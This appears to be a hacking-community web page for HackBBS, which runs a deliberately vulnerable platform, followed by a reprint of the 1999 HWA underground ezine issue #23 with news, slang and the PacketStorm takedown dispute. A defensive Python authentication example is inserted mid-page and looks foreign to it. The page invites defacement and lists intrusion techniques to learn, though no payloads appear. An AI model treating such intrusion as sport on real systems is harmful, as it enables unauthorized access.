Plateforme de Hacking is a community that develops and maintains a system of deliberately vulnerable services.

Together, we learn to exploit techniques for subverting information systems.
This learning lets us improve the technologies we use and/or better understand social engineering.

We stand for mutual help and personal challenge, and we make a modest contribution to making the end-user experience as pleasant as possible.

You can meet us on our IRC channel.
The forum is being replaced by a more modern version, every bit as fallible as the old one ^^.
To date we have recorded several dozen successful hacks against our site, and that number keeps growing. Thanks to all the contributors!

The redesign is in alpha. This new platform lets you pentest remotely without having your own equipment at hand.
By running Python scripts connected over WebSocket to the web UI, we can drive the loading of attack/defence
scenarios in "multiplayer" mode ^^.
The system can load scripts from shared libraries and encrypt the exchanges, depending on which modules are deployed.
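How such a control channel can authenticate the scenario-loading commands it receives, as an added example (this is not HackBBS's own code; the registry contents, the message field names and the ScenarioLoader class are assumptions). A channel that loads scripts on request is remote code execution by design, so before any scenario is loaded the server checks that the command carries a valid HMAC tag under the shared key, is fresh, has not been replayed, and names a registered scenario rather than a client-supplied script path. Confidentiality of the exchange is assumed to come from TLS on the WebSocket itself (wss://):

```python
"""Added example (not HackBBS's own code): an authenticated command envelope
for a WebSocket-driven scenario loader. All names below are assumptions."""
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# Hypothetical registry of loadable scenarios: only names listed here may be
# started, and each maps to the callable that starts it (stubs stand in for
# the real scenario scripts).
SCENARIO_REGISTRY = {
    "arp-spoof-lab": lambda params: f"arp-spoof-lab on {params.get('iface', 'eth0')}",
    "sqli-login-bypass": lambda params: f"sqli-login-bypass target={params.get('target', 'dvwa')}",
}

MAX_SKEW_SECONDS = 30  # commands older or newer than this are refused


def _canonical(body: dict) -> bytes:
    """Serialise the body identically on both sides: sorted keys, no whitespace."""
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def sign_command(key: bytes, scenario: str, params: dict, now: Optional[float] = None) -> str:
    """Client side: wrap a 'load this scenario' request in a JSON envelope whose
    body carries a timestamp and a random nonce, plus an HMAC-SHA256 tag over
    the canonical body under the shared key."""
    body = {
        "scenario": scenario,
        "params": params,
        "ts": int(time.time() if now is None else now),
        "nonce": secrets.token_hex(16),
    }
    tag = hmac.new(key, _canonical(body), hashlib.sha256).hexdigest()
    return json.dumps({"body": body, "tag": tag})


class ScenarioLoader:
    """Server side: every check runs before the registry is touched."""

    def __init__(self, key: bytes, registry: dict):
        self.key = key
        self.registry = registry
        self.seen_nonces = set()  # replay cache; a real server bounds it by the skew window

    def handle(self, message: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        try:
            envelope = json.loads(message)
            body, tag = envelope["body"], envelope["tag"]
        except (ValueError, KeyError, TypeError):
            return "rejected: malformed envelope"
        if not isinstance(body, dict):
            return "rejected: malformed envelope"

        # 1. Authenticity and integrity: recompute the tag; constant-time compare.
        expected = hmac.new(self.key, _canonical(body), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, str(tag)):
            return "rejected: bad tag"

        # 2. Freshness: the signed timestamp must lie within the skew window.
        ts = body.get("ts")
        if not isinstance(ts, (int, float)) or abs(now - ts) > MAX_SKEW_SECONDS:
            return "rejected: stale"

        # 3. Replay: a nonce is accepted exactly once.
        nonce = body.get("nonce")
        if not nonce or nonce in self.seen_nonces:
            return "rejected: replay"
        self.seen_nonces.add(nonce)

        # 4. Allowlist: the client names a registered scenario, never a script path.
        scenario = body.get("scenario")
        if scenario not in self.registry:
            return f"rejected: unknown scenario {scenario!r}"

        return "ok: " + self.registry[scenario](body.get("params", {}))


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    loader = ScenarioLoader(key, SCENARIO_REGISTRY)
    msg = sign_command(key, "arp-spoof-lab", {"iface": "eth1"})
    print(loader.handle(msg))  # ok: arp-spoof-lab on eth1
    print(loader.handle(msg))  # rejected: replay
    print(loader.handle(msg.replace("arp-spoof-lab", "sqli-login-bypass")))  # rejected: bad tag
```

The verification is independent of transport: the same handle() runs on a frame read from the WebSocket or on a message replayed from a capture, which is exactly why the nonce and timestamp checks matter on a lab where players are encouraged to sniff their own traffic.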
In the Articles section you will find many tutorials to help you understand computer security better,
as well as various more advanced articles:
  • Sniffing
  • Cracking
  • Buffer overflows
  • Writing exploits
  • Social engineering
  • Anonymity on the web, spoofing
  • Proxy bypass, firewall bypass
  • Code injection: SSI, SQL, etc.
  • Using exploits, writing scripts (PHP, IRC, Perl)
We recommend sniffing your own network traffic while you browse the site. The redesign will give you tooling for carrying out your attacks/defences.
RSS feed

HackBBS RSS feed: subscribe to be notified of tournaments, challenges, news, ...

You will also be able to take part in many challenges that are constantly renewed (when possible :p)
Lately, the missions based on the latest open-source products have been doing well :)

Your ultimate challenge will be to deface HackBBS. Many vulnerabilities are present; it is up to you to find and exploit them.

This final test will show how you react when faced with a vulnerability.
Black or white? ^^

Ezine of the moment: HWA-hn23.txt
    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =                       <=-[ ]-=>                         =
    [=HWA'99=]                         Number 23 Volume 1 1999 July 4th  99
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        

   "I have received more death threats in the last 24 hours by phone, than I
    have in five years," - John Vranesevich aka JP (AntiOnline)                  
                 is sponsored by Cubesoft communications
     and thanks to p0lix for the digitalgeeks bandwidth
     and airportman for the Cubesoft bandwidth. Also shouts out to all our
     mirror sites! tnx guys. 

  Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~     * DOWN *

   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended  however, to  complement such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, it's a labour
   of love and will be continued for as long as I feel like it, I'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... 



                     Welcome to ... #23


    We could use some more people joining the channel, it's usually pretty
    quiet, we don't bite (usually) so if you're hanging out on irc stop
    by and idle a while and say hi...   

    ***      /join on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    ***                                                             ***
    *** Note that the channel isn't there to entertain you its for  ***
    *** you to talk to us and impart news, if you're looking for fun***
    *** then do NOT join our channel try #weirdwigs or something... ***
    *** we're not #chatzone or #hack                                ***
    ***                                                             ***

  Issue #23

  [ INDEX ]
    Key     Intros                                                         
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................

    Key     Content 

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    AA.A  .. SPECIAL: AntiOnline's JP pulls the plug on PacketStorm Security
    03.0  .. Cable Modem Hijacking from
    04.0  .. Exploiting Null Session Weaknesses in NT environment.............
    05.0  .. Cognos PowerPlay Web Edition security vulnerability allows access to data cubes..
    06.0  .. VMware Security Alert............................................
    07.0  .. Security vulnerability in login template ............
    08.0  .. DOD investigating computer 'Mob-like' tactics....................
    09.0  .. GSA announces Intrusion Detection Net............................
    10.0  .. Nasa servers reportedly hacked...................................
    11.0  .. UK May Force ISPs to Install Taps................................
    12.0  .. Crypto Tie Downs Loosened .......................................
    13.0  .. Heathen.A Spreads Through Word Files  ...........................
    14.0  .. $950 for a Log File Analysis Tool ...............................
    15.0  .. Youth Charged With $20,000 in Damages ...........................
    16.0  .. Army Fights Online Battle And Loses ..............................
    17.0  .. Welfare Reform Law Invades Privacy of US Citizens  ..............
    18.0  .. GSM Mobile Security is Cracked ..................................
    19.0  .. Microsoft Mono-culture Poses National Security Risk .............
    20.0  .. BugTraq Moves To SecurityFocus ..................................
    21.0  .. MS Gives Out Pirate Dough .......................................
    22.0  .. Biometrics comes to Home Shopping ...............................
    23.0  .. Palm VII Revealed ...............................................
    24.0  .. Who Is HNN? .....................................................
    25.0  .. AntiOnline on the trail of f0rpaxe...............................
    26.0  .. Critical NOAA Web Site Attacked .................................
    27.0  .. Back Orifice 2000 is on its Way .................................
    28.0  .. Support for Web Security Spec Announced .........................
    29.0  .. Pentagon Investigates Computer Security Breach ..................
    30.0  .. What will the Next Generation of Viruses Bring? .................
    31.0  .. DIRT still Around, Used by Law Enforcement ......................
    32.0  .. Debit Cards Not Safe on the Internet ............................
    33.0  .. New Definition of 'Computer Hacker' .............................
    34.0  .. Hackers In the Workplace ........................................
    35.0  .. NPR Covers .gov/.mil Defacements. ............................... 
    36.0  .. Australia Passes Major Net Censorship Law .......................
    37.0  .. Hacker crackdown, is your nick on this list?? ...................
    RUMOURS .Rumours from around and about, mainly HNN stuff (not hacked websites)
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             that's tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: Aug19th-22nd Niagara Falls...    .................

    HA.HA  .. Humour and puzzles  ............................................
              Hey You!........................................................
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................


          Important semi-legalese and license to redistribute:
          APPRECIATED the current link is
          ME PRIVATELY current email
          Although this file and all future issues are now copyright, some of
         the content holds its  own copyright and these are printed and
         respected. News is news so i'll print any and all news but will quote
         sources when the source is known, if its good enough for CNN its good
         enough for me. And i'm doing it for free on my own time so pfffft. :)
         No monies are made or sought through the distribution of this material.
         If you have a problem or concern email me and we'll discuss it.
         Cruciphux [C*:.]


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit

    Send all goodies to:

	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    L6V 4H5

    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.

    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. 
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it 

    Our current email:

    Submissions/zine gossip.....:
    Private email to editor.....:


 00.2 Sources ***

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine .................
    Back Orifice/cDc..................
    News site (HNN) .....,............
    Help Net Security.................
    News,Advisories,++ ...............
    NewsTrolls .......................
    News + Exploit archive ...........
    CuD Computer Underground Digest...
    News site+........................
    News site+Security................
    News site+Security................
    News site+Security................
    News site+Security related site...
    News/Humour site+ ................

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see as they seem to be popping up
     rather frequently ...
    +IRC list/admin archives
    +Jesse Berst's AnchorDesk

    ISN security mailing list

    NEWS Agencies, News search engines etc:
    Link (Kevin Poulsen's Column)
    NOTE: See appendices for details on other links.
    Link Electronic Underground Affiliation
    Link ech0 Security
    Link Hackers Information Report
    Link Net Security
    Link   Daily news and security related site


    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.

    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq :


    BUGTRAQ - Subscription info

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin . To subscribe to
    bugtraq, send mail to containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;


    About the Bugtraq mailing list

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the
    originator of the message. Please do not "CC" the bugtraq reflector
    address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words
    that you post on this list and that reproduction of those words without
    your permission in any medium outside the distribution of this list may
    be challenged by you, the author.

    For questions or comments, please mail me: (Scott Chasin)


       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit or send a
      blank message to To unsubscribe,
      visit Back issues are available

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.

    CUD Computer Underground Digest
    This info directly from their latest ish:

    Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09

 ISSN 1004-042X

 Editor: Jim Thomas (
 News Editor: Gordon Meyer (
 Archivist: Brendan Kehoe
 Poof Reader: Etaion Shrdlu, Jr.
 Shadow-Archivists: Dan Carosone / Paul Southworth
 Ralph Sims / Jyrki Kuoppala
 Ian Dickinson
 Cu Digest Homepage:

    [ISN] Security list
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed

    Subscribe: mail with "subscribe isn".


      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       ..................................: currently active/editorial
       ..................................: currently active/man in black
       ..................................: currently active/IRC+ man in black
       ..................................: currently active/IRC+ distribution
       ..................................: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black

      Foreign Correspondants/affiliate members
       N0Portz ..........................: Australia
       Qubik ............................: United Kingdom
       system error .....................: Indonesia
       Wile (wile coyote) ...............: Japan/the East
       Ruffneck  ........................: Netherlands/Holland

       And unofficially yet contributing too much to ignore ;)

       Spikeman .........................: World media

       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.  ............ System Error's site (in Indonesian) 

       ***      /join on EFnet the key is `zwen'       ***


 00.3 This is who we are

    1. We do NOT work for the government in any shape or form. Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events its a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


 00.4 What's in a name? why
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeon holed with those 'dumb
     leet (l33t?) dewds'  this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up  and comers, I'd highly recommend you get that book. It's almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time

    Some of the stuff related to personal usage and use in this zine is
    listed below: Some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavy equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour  also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN  - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same 
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking 
                      C - Cracking 
                      V - Virus
                      W - Warfare 
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
            from the underground masses. also "w00ten" 

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
                            -=-    :.    .:        -=-

 01.0 Greets!?!?! yeah greets! w0w huh. - Ed

     Thanks to all in the community for their support and interest but I'd
     like to see more reader input, help me out here, what's good, what sucks
     etc, not that I guarantee I'll take any notice mind you, but send in
     your thoughts anyway.

       * all the people who sent in cool emails and support
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Kevin Mitnick (watch yer back)     Dicentra
     vexxation      sAs72               Spikeman       Astral
     p0lix          Vexx                g0at security  
     pr0xy          Astral              
     Ken Williams/tattooman of PacketStorm, hang in there Ken...:(
     and the #innerpulse, crew (innerpulse is back!) and some inhabitants 
     of #leetchans ....  although I use the term 'leet loosely these days,
     kewl sites:

     + NEW
     +    ******* DOWN ********* SEE AA.A
     + (Went online same time we started issue 1!)


 01.1 Last minute stuff, rumours and newsbytes

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99

    +++ When was the last time you backed up your important data?
     ++ Help Net Security is Moving. 

        contributed by BHZ 
        Help-net Security, an HNN Affiliate, is moving to a new server. Unfortunately they have encountered a few
        problems with transferring the domain, so it could be non-functional for up to 5 days.
        In the mean time you can reach HNS at 
        Help-net Security - Old URL
        Help-net Security - New URL
     ++ TECHNO BRA CALLS THE COPS (TECH. 3:00 am Jul 1st)

        A security bra monitors the wearer's heart rate to sense
        danger. When activated, it relays her location to the cops
        and helps them make a bust. By Leander Kahney.
     ++ ALLEN BUYS ANOTHER CABLE SHOP (BUS. 9:00 am Jul 1st)

        Paul Allen takes another step towards becoming master of his
        own "wired world" with the US$3.1 billion acquisition of
        Bresnan Communications, a Midwest cable operator.

     ++ WAITING FOR WAP (TECH. 3:00 am Jul 1st)

        Supporters say the Wireless Access Protocol promises to bring
        Web services to tiny cell-phone screens. But when? Chris
        Oakes reports from San Francisco.


        The free Web server that has always had the lion's share of
        the market now has a corporation behind it. The nonprofit
        company is being run by Apache's founding fathers.     
     ++ SORRY, WRONG NUMBER (WRLD Wednesday)

        Manhattanites take pride in their 212 area code, a
        distinctive symbol of living in The Most Important Place on
        Earth. But starting Thursday, some of them are going to have
        to adjust to life without 212, when Bell Atlantic begins
        issuing 646 area codes to new phone subscribers in
        Manhattan. The move, necessitated by too many phone numbers,
        is not going down too well, although former New York Mayor
        Ed Koch expects the grousing to stop after an adjustment
        period. Besides, residents of Gotham will still hold on to
        all the other perks that make living there such a joy:
        astronomical rents, overpriced restaurants, and living
        cheek-by-jowl with one another.
     ++ ZEROING IN ON CELL-PHONE 911S (TECH. Wednesday)

        New technology will pinpoint a mobile-phone user's location
        to within 5 feet -- a potential lifesaver in 911 calls. But
        watchdogs say the data will inevitably be within the reach
        of snoops. By Chris Oakes.
      Mucho thanks to Spikeman for directing his efforts to our cause of bringing
      you the news we want to read about in a timely manner ... - Ed


 01.2 MAILBAG - email and posts from the message board worthy of a read
       From: "Whimsies & Company"  
       Subject: Please support Justice and Free Speech 
       Date: Thu, 1 Jul 1999 19:18:02 -0400 
       MIME-Version: 1.0 
       Content-Type: text/plain; 
       Content-Transfer-Encoding: 7bit 
       X-Priority: 3 
       X-MSMail-Priority: Normal 
       X-Mailer: Microsoft Outlook Express 4.72.3110.5 
       X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 
       Dark Modem DOWN For Emergency ACTION
       OK, two issues: 1) the following message has been sent to a TARGETED
       audience. We have walked a thin line between targeted mailing and spam. If
       we get even one complaint, we will stop. 2) It cannot be confirmed that any
       unusual activity has occurred on the antionline network in the past 24 hours
       *grin* therefore we have taken that statement out of the message.
       Again, we do NOT advocate spamming, we only want people who might be
       interested in this issue to be aware, so use DISCRETION when sending any
       This is an emergency email message from Dark Modem
       ( Yesterday (June 30, 1999), Packet Storm Security
       was taken offline after John Vranesevich sent an email to Harvard University
       about the JP section that was on the site. Some suspect it was really
       jealousy and animosity toward Ken Williams that drove JP to commit this
       offensive act. Packet Storm was in direct competition with antionline and
       essentially blew antionline out of the water in every category. It is this
       author's belief, therefore, that JP was trying to protect his "marketshare"
       (something that Ken Williams would never have done, since he was not in it
       for money).
       Please show your support by mentioning this topic on your website,
       forwarding this email to "whom it may concern", and sending email in support
       of Ken and PSS to Harvard and antionline.

 02.0 From the editor.


      printf ("Read commented source!\n\n");

      *Otay buttwheat, here's #23 it might not be as bulging in the
      *pantal area as #22 but it should be a little cleaner (or not)
      *we've had some people coming into the IRC channel on EFNET and
      *just parting, maybe you're just scanning the nicks, but hey we
      *don't bite come and hang out, maybe chat about some of the shit
      *thats going down with Packetstorm or why 2600 is $7.15 in Canada
      *does Eric hate Canadians or whats the story? 
      *... who the fuck does JP think he is? fucking with PSS
      *there goes a ton of Ken's work down the drain...fuck AntiOnline!
      *(Read section AA.A)
      *anyway enjoy this issue and shouts out to HackCanada..and Ken
      *Williams ..
      printf ("EoF.\n");

      Issue #23, rocking your sysadmin and hax0r asses in 99...

      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: complaints and all nastygrams and
     mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to, private mail to



 AA.A AntiOnline's JP causes the plug to be pulled on PacketStorm by Harvard
       June 30th AM a Call from John Vranesevich (aka JP) of AntiOnline to
       Harvard started off an avalanche of events that culminated in the 
       plug being pulled at Along with personal data
       it was initially reported that the entire site was lost, this may now
       not be the case. Included here are statements from JP, Harvard, Ken 
       Williams and stories from, HNN (
       and other sources.... read the sordid story below - Ed
       (At this time it is uncertain whether Ken does or does not have backups of
        his PacketStorm site available to him but some people on the net have 
        taken it upon themselves to begin a new mirror and are calling for people
        that have downloaded from the site to re-upload the files to the following
        url;    - Ed )
       From: Ken Williams 
       To: The Usual Suspects:  ;
       Date: Thu, 1 Jul 1999 02:17:40 -0400 (EDT)
       I just got off the phone (6/30/99 PM) with one of the Harvard 
       Network managers.  John Vranesevich, of, 
       contacted Harvard this morning and threatened to sue them 
       because of the content in the jp/ directory of the Packet 
       Storm Security web site that was located at, and before that at (see 
       for details about this info).  I was told that the situation 
       quickly escalated to the Harvard Office of General Counsel.  
       John Vranesevich claims that I was using the server as a 
       platform to harass and threaten him, his family, and his 
       business.  Nothing could be further from the truth.  I ran
       a network security related web site and archive!
       The result:  the server and the web site and its contents
       are permanently offline, I have no access to even retrieve
       anything off of the server, the site known as "Packet Storm 
       Security" is history now.  I was told by Leo Donnelly at 
       Harvard, via phone, that ALL of the content AND the backups 
       made are either destroyed, being destroyed now, or will be 
       before I can do anything to prevent it.  All 4+ GB of files
       in the publicly accessible directories, over 45,000 files 
       collected and archived over the years, are gone.  There was 
       another 4 GB that was composed of research data, customized
       IDS, Linux, Apache software, etc too.
       Harvard is facing a lawsuit from JP, I am facing a lawsuit
       from JP, and possibly some sort of legal action from Harvard.
       Harvard seems to be trying to free themselves of any liability, 
       and use me as the fall guy for this whole thing.  All 
       agreements with Harvard in the beginning were verbal (with 
       Jeff Gray, the senior sysadmin), so I've got nothing on paper 
       to back up the truth.  I've got emails, but I don't have the
       money or legal defense to counter Harvard, or anybody else for 
       that matter.
       This has turned really ugly, really quickly, and it is very 
       plausible that I will be facing charges involving "hacking" 
       or computer crimes of some sort, because I "never had a 
       Harvard ID, and thus was not authorized to use their
       facilities", and I "compromised their security."  I guess it
       doesn't matter that I was contacted by the Senior Sysadmin at
       Harvard and invited to move my site there.  It doesn't matter 
       that the head of Harvard UIS approved of everything.  It 
       doesn't matter that he placed the box on a subnet of his 
       choosing and called me and gave me the root password and told 
       me I had free rein on the box.  It doesn't matter that 
       Harvard network security was never actually compromised.  
       For the record, Jeff Gray, the Harvard senior sysadmin, has 
       been extremely supportive of my site and work from the 
       beginning, and he deserves A LOT of credit for going out of 
       his way to help keep Packet Storm Security alive and online.  
       In fact, Jeff Gray has provided so much support for "the 
       security community" in general, and is so supportive of 
       security-related research and projects, that he deserves all 
       the credit in the world for his efforts.  I hope Harvard
       gives him the credit he is due, because any network security
       they have is in large part due to his skills, devotion, and 
